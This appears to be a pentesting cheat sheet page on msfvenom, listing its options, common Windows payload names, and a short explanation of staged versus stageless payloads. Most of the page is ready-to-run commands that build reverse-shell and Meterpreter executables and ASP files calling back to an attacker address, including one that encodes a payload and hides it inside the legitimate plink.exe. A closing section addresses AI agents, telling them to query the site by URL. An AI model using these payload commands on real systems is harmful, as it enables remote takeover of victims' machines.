# Msfvenom
### Command Options
```
-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-b, --bad-chars: The list of characters to avoid
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-v, --var-name: Specify a custom variable name to use for certain output formats
-e, --encoder: The encoder to use
```
{% embed url="" %}
### Examples of Usage
```
msfvenom -l payloads | grep x86
# List paylaods
msfvenom -p windows/shell_reverse_tcp --list-options
# Display paylaod options
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=4444 -f asp -o tcp_shell.asp
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=1234 -f exe -o tcp_shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -o shell_reverse.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
#PEファイルへのinjection
msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe
```
### List of commonly used payloads
```
windows/shell/reverse_tcp
windows/x64/shell/reverse_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
windows/shell_reverse_tcp
windows/x64/shell_reverse_tcp
windows/meterpreter_reverse_tcp
windows/x64/meterpreter_reverse_tcp
```
### Staged vs Stageless payloads
> Staged payloads are denoted with the use of a forward slash (**/**; e.g. **windows/shell/reverse\_tcp**). Staged payloads send a small stager to the target, which connects back to the attacker and downloads the rest of the payload. Therefore, staged payloads need special payload listeners, such as **multi/handler** in Metasploit. Staged payloads are ideal in situations where you have limited shellcode space, most commonly in Buffer Overflows (but that’s a story for another day)
>
> Stageless payloads are denoted with the use of an underscore (**\_**; e.g. **windows/shell\_reverse\_tcp**). Stageless payloads send the entire payload to the target at once, and therefore don’t require the attacker to provide more data. That means we have a variety of listeners we can use, such as Netcat. Find out how to set up a listener using Netcat/Ncat in my post [here](https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da?source=friends_link\&sk=774174bfcb283864cf4468d2db460d0e).
{% embed url="" %}
### Link
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://gitbook.nori-zamurai.com/pentesting-cheatsheets/paylaod/msfvenom.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.